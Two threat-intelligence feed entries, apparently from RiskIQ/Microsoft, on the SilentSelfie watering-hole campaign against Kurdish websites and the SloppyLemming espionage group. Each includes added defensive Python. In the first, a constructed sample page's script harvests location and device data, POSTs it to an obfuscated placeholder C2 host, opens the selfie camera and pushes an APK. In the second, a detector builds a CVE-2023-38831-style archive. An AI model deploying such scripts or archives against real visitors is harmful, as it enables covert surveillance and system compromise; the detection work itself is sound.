Source |
RiskIQ |
Identifier |
8585058 |
Publication date |
2024-09-25 19:49:34 (viewed: 2024-09-25 20:18:29) |
Title |
SilentSelfie: Uncovering a major watering hole campaign against Kurdish websites (Recycled) |
Text |
## Snapshot
Sekoia's Threat Detection & Research (TDR) team has released a report detailing a series of cyberattacks targeting Kurdish websites.
## Description
The team found 25 Kurdish websites compromised with four different variants of a malicious script. The compromised sites include outlets of the Kurdish press and media, sites of the Rojava administration and its armed forces, and political parties and revolutionary organizations from Turkey and the Kurdish regions.
The scripts varied in complexity, from basic versions that only collected the visitor's current location to more advanced ones that tracked locations for up to 400 days, accessed the selfie camera, and pushed a malicious Android app. Designed to gather intelligence on visitors, the scripts collected data such as location, images, and device information, and some employed obfuscation to evade detection. The most sophisticated variant directed users to install a malicious APK that harvested contacts, location, and network details.
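The capabilities the report attributes to the injected scripts (geolocation, selfie camera, device fingerprinting, an APK push) each require a specific browser API, so a site owner or responder can sweep pages for those calls and for the obfuscation markers that usually accompany an injected loader. The scanner below is an added example, not Sekoia's or Microsoft's code; the indicator lists are assumptions rather than published signatures, and the two sample pages are constructed for the demo.

```python
"""Heuristic scan of a web page for watering-hole profiling scripts.

Added example, not Sekoia's or Microsoft's code: it flags the behaviours the
report attributes to the injected scripts (geolocation, selfie camera, device
fingerprinting, an APK push) plus obfuscation markers. The indicator lists are
assumptions, not published signatures; the sample pages are constructed.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

# Browser APIs a script must call to obtain each data class the report mentions.
CAPABILITY_PATTERNS = {
    "geolocation": re.compile(r"navigator\.geolocation\.(getCurrentPosition|watchPosition)"),
    "camera": re.compile(r"getUserMedia\s*\("),
    "device_info": re.compile(r"navigator\.(userAgent|platform|hardwareConcurrency|deviceMemory)"),
    "apk_push": re.compile(r"\.apk\b", re.IGNORECASE),
}
HIGH_RISK = {"geolocation", "camera", "apk_push"}

# Dynamic-evaluation and encoded-string carriers typical of obfuscated loaders.
OBFUSCATION_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"String\.fromCharCode"),
    re.compile(r"\batob\s*\("),
    re.compile(r"(\\x[0-9a-fA-F]{2}){4,}"),  # long runs of hex-escaped bytes
]


class _ScriptCollector(HTMLParser):
    """Collects inline <script> bodies and external script src attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.inline: List[str] = []
        self.external: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def scan_page(html: str, trusted_hosts: List[str]) -> Dict[str, object]:
    """Return capabilities, obfuscation hit count, off-site script URLs, verdict."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    caps, obf_hits = set(), 0
    for body in collector.inline:
        caps.update(name for name, pat in CAPABILITY_PATTERNS.items() if pat.search(body))
        obf_hits += sum(1 for pat in OBFUSCATION_PATTERNS if pat.search(body))
    # Relative src values are same-origin; an injected loader usually lives
    # off-site, so any other host not on the allow-list is reported.
    untrusted = [s for s in collector.external
                 if urlparse(s).hostname and urlparse(s).hostname not in trusted_hosts]
    if caps & HIGH_RISK:
        verdict = "suspicious"
    elif caps and (obf_hits >= 2 or untrusted):
        verdict = "review"
    else:
        verdict = "clean"
    return {"capabilities": sorted(caps), "obfuscation": obf_hits,
            "untrusted_scripts": untrusted, "verdict": verdict}


# Constructed pages. The compromised one mimics the reported behaviours; the
# base64 literal decodes to the placeholder host https://c2.example.invalid.
COMPROMISED_PAGE = """<html><body><h1>News</h1>
<script src="/static/site.js"></script>
<script src="https://static.example.invalid/loader.js"></script>
<script>
(function(){
  var d = {ua: navigator.userAgent, p: navigator.platform};
  navigator.geolocation.getCurrentPosition(function(pos){
    d.lat = pos.coords.latitude; d.lon = pos.coords.longitude;
    fetch(atob("aHR0cHM6Ly9jMi5leGFtcGxlLmludmFsaWQ="), {method: "POST", body: JSON.stringify(d)});
  });
  navigator.mediaDevices.getUserMedia({video: {facingMode: "user"}}).then(function(s){});
  if (/Android/.test(navigator.userAgent)) { location.href = "/update/app.apk"; }
})();
</script></body></html>"""

CLEAN_PAGE = """<html><body><h1>News</h1>
<script src="/static/site.js"></script>
<script>document.getElementById("d").textContent = new Date().toLocaleDateString();</script>
</body></html>"""
```

A real sweep fetches each page of the sites in scope and passes the HTML together with the site's own hosts; a "suspicious" verdict on a news or party page that has no business asking for location or camera access is the cue to pull the script for analysis. A loader that only fetches a second stage will not match the capability patterns, which is why off-site scripts are listed separately for manual review.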
The campaign is notable for its duration and scale, having begun in late 2022. Although attribution remains uncertain, Sekoia's TDR assesses that the potential actors include the Turkish intelligence services, the Syrian intelligence services, the Kurdish Regional Government, and Iran, each with a motive of varying plausibility given the geopolitical tensions involving Kurdish forces in the Middle East.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint.
- Turn on [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint.
- Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203E-5155-4B5E-AF74-21562B1004D5/analystreport) |
Notes |
★★
|
Sent |
Yes |
Tags |
Ransomware
Tool
Threat
Mobile
|
Source |
RiskIQ |
Identifier |
8585015 |
Publication date |
2024-09-25 18:33:07 (viewed: 2024-09-25 19:18:22) |
Title |
Unraveling SloppyLemming's Operations Across South Asia |
Text |
#### Targeted Geolocations
- Pakistan
- Sri Lanka
- China
- Bangladesh
#### Targeted Industries
- Government Agencies & Services
- Law Enforcement
- Defense
- Information Technology
- IT Products & Services
- Energy
- Transportation Systems
- Education
- Higher Education
## Snapshot
Cloudforce One has released a report detailing the activities of SloppyLemming, an advanced threat actor that has been observed impacting organizations in South and East Asian countries as part of an extensive espionage campaign.
## Description
SloppyLemming, also tracked as OUTRIDER TIGER by [CrowdStrike](https://www.crowdstrike.com/adversaries/outrider-tiger/), is known for leveraging cloud service providers for credential harvesting, malware delivery, and command-and-control (C2) activities. The group often employs adversary emulation frameworks such as [Cobalt Strike](https://security.microsoft.com/intel-profiles/fd8511c1d61e93d39411acf36a31130a6795efe186497098fe0c6f2ccfb920fc) and the open-source Havoc.
Cloudforce One notes that the group's operations display poor operational security, which allowed Cloudforce One to gain insight into their tools and tactics. A key focus of their operations is credential harvesting, often achieved through phishing emails that lead victims to fake login pages hosted on malicious Cloudflare Workers. The group uses a tool called CloudPhish to scrape login-page HTML and log stolen credentials via Discord.
In addition to phishing, SloppyLemming has been observed collecting Google OAuth tokens and running malware operations. For instance, the group has used Dropbox to host malicious RAR files that exploit the WinRAR vulnerability [CVE-2023-38831](https://security.microsoft.com/intel-explorer/cves/CVE-2023-38831/). These archives contain executables that deploy Remote Access Tools (RATs), enabling the group to maintain long-term access to compromised systems.
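The archive trick behind CVE-2023-38831 (WinRAR before 6.23 ran a script when the user opened a harmless-looking file from an archive that also held a same-named folder, typically with trailing whitespace, containing an executable) is visible in the entry listing alone, so a mail gateway or sandbox can triage such attachments before extracting anything. The detector below is an added example, not the actor's tooling, Cloudforce One's code, or a published signature; the executable-extension list is an assumption, and the sample archive is constructed in memory as a ZIP because the standard library can build one, while the same function accepts `rarfile.RarFile.namelist()` output for the RAR files the report mentions.

```python
"""Spot the CVE-2023-38831 archive layout from an entry listing.

Added example, not SloppyLemming's tooling, Cloudforce One's code, or a
published signature. WinRAR before 6.23 would run a script when the user
double-clicked a harmless-looking file inside an archive that also held a
folder with the same name (usually with trailing whitespace) containing an
executable. Only entry names are needed, so this works on
rarfile.RarFile.namelist() output as well as on the constructed ZIP below.
"""
import io
import posixpath
import zipfile
from typing import Dict, List

# Extensions Windows would execute rather than display. Assumed list.
EXEC_EXT = {".cmd", ".bat", ".exe", ".scr", ".vbs", ".vbe", ".js", ".jse",
            ".wsf", ".ps1", ".lnk", ".com", ".pif", ".hta"}


def _norm(name: str) -> str:
    # Trailing whitespace and case are the trick: "Report.pdf " is a distinct
    # archive entry but collides with "Report.pdf" once extracted on Windows.
    return name.rstrip().casefold()


def detect_38831_layout(names: List[str]) -> List[Dict[str, str]]:
    """Return decoy/folder/payload triples for every matching pairing.

    `names` are archive entry paths with '/' separators; directory entries
    ending in '/' may be present or absent.
    """
    top_files = [n for n in names if "/" not in n]
    nested = [n for n in names if "/" in n and not n.endswith("/")]
    findings = []
    for decoy in top_files:
        for path in nested:
            folder, _, rest = path.partition("/")
            if _norm(folder) != _norm(decoy):
                continue
            leaf = rest.rsplit("/", 1)[-1]
            _stem, ext = posixpath.splitext(leaf)
            if ext.lower() in EXEC_EXT:
                findings.append({"decoy": decoy, "folder": folder, "payload": path})
    return findings


def scan_archive_bytes(data: bytes) -> List[Dict[str, str]]:
    """Run the detector over a ZIP held in memory (swap in rarfile for RAR)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return detect_38831_layout(zf.namelist())


def build_sample_archive() -> bytes:
    """Constructed archive with the decoy/folder/script layout; not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Report.pdf", b"%PDF-1.4 decoy document")
        zf.writestr("Report.pdf /Report.pdf .cmd", b"@echo off\r\necho placeholder\r\n")
        zf.writestr("images/logo.png", b"\x89PNG placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_archive_bytes(build_sample_archive()):
        print(f"decoy {hit['decoy']!r} paired with executable {hit['payload']!r}")
```

Matching is done on the normalised names rather than exact strings because the whole exploit rests on two names that differ only by trailing whitespace or case, and a check that ignored that would miss the sample. A folder that merely shares a file's name without holding an executable is left alone; that layout is unusual but not an exploit on its own.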
SloppyLemming's credential harvesting operations primarily target organizations in Pakistan, focusing on sectors such as government, transportation, education, technology, and energy. Notably, the group has shown a particular interest in Pakistani law enforcement agencies and entities involved with the country's nuclear power facility. Beyond Pakistan, SloppyLemming's efforts have extended to government and military organizations in Sri Lanka and Bangladesh, as well as the Chinese energy and academic sectors.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protect |
Notes |
★★★
|
Sent |
Yes |
Tags |
Ransomware
Malware
Tool
Vulnerability
Threat
Legislation
Cloud
|